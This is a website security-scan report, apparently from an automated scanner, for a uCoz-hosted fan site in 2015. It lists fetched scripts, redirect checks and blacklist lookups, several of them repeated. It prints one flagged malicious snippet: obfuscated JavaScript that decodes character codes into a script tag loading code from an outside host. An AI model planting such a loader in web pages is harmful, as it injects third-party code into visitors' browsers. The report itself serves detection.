Scanned pages/files
Request | Server response | Status |
http://supernatural-in.3dn.ru/ | 200 OK Content-Length: 77517 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://xtens1on.net.ru/links/JSFX_green.js | 500 Can't connect to xtens1on.net.ru:80 Content-Length: 190 Content-Type: text/plain | clean |
http://xtens1on.net.ru/test404page.js | 500 Can't connect to xtens1on.net.ru:80 Content-Length: 190 Content-Type: text/plain | clean |
http://s34.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s34.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s34.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://donate.smscoin.com/js/smsdonate.js | 200 OK Content-Length: 775 Content-Type: application/x-javascript | clean |
http://goall.net.ru/informer/13-1 | 500 Can't connect to goall.net.ru:80 Content-Length: 187 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: supernatural-in.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jul 2015 15:10:43 GMT
Server: uServ/3.2.2
Content-Length: 77517
Content-Type: text/html; charset=UTF-8
...77517 bytes of data.
GET / HTTP/1.1
Host: supernatural-in.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jul 2015 15:10:43 GMT
Server: uServ/3.2.2
Content-Length: 77517
Content-Type: text/html; charset=UTF-8
...77517 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: supernatural-in.3dn.ru
Referer: http://www.google.com/search?q=supernatural-in.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: supernatural-in.3dn.ru
Referer: http://www.google.com/search?q=supernatural-in.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=supernatural-in.3dn.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://supernatural-in.3dn.ru/
Result: supernatural-in.3dn.ru is not infected or malware details are not published yet.
Result: supernatural-in.3dn.ru is not infected or malware details are not published yet.